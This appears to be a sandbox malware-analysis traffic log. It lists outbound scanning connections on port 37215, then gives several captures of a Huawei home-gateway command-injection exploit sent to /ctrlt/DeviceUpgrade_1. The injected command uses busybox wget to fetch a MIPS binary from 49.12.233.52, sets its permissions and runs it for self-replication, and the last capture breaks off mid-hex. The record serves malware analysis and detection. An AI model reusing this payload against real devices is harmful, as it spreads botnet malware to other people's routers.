Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.244.237.225:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.105.213.133:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.234.179.200:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.56.218.250:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.47.182.162:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.96.150.156:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.15.63.27:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.0.18.128:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.114.42.85:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.167.156.91:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.29.121.226:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.189.211.101:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.255.70.48:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.238.216.121:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.231.51.69:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.233.76.110:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.137.90.184:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.212.124.27:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.15.74.152:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.249.101.87:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.226.208.234:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.63.39.11:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.79.21.208:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.7.221.208:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.163.94.229:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.181.13.152:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.44.20.67:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.127.110.176:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.222.161.33:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.248.4.124:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.98.128.61:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.128.77.66:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.154.111.225:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.8.132.154:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.141.202.91:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.198.164.14:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.181.173.207:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.148.193.21:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.248.7.216:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.6.248.59:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.177.123.121:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.135.135.11:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.208.225.177:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.113.96.230:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.136.20.229:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.107.220.144:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.184.107.110:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.156.69.230:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.85.39.83:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.85.50.147:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.80.36.116:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.234.175.200:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.6.56.210:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.22.51.214:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.29.126.135:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.82.164.137:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.55.16.248:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.146.207.95:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.157.121.79:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.107.114.224:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.52.175.25:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.171.61.185:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.172.197.34:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.118.203.124:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.180.234.28:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.92.198.47:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.103.77.196:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.252.32.64:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.155.200.53:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.197.213.95:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.158.66.74:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 197.32.166.87:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.83.94.92:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.233.196.131:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.46.177.21:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.101.45.72:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 156.159.74.20:37215
Source: global traffic	TCP traffic: 192.168.2.23:62199 -> 41.122.217.146:37215

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 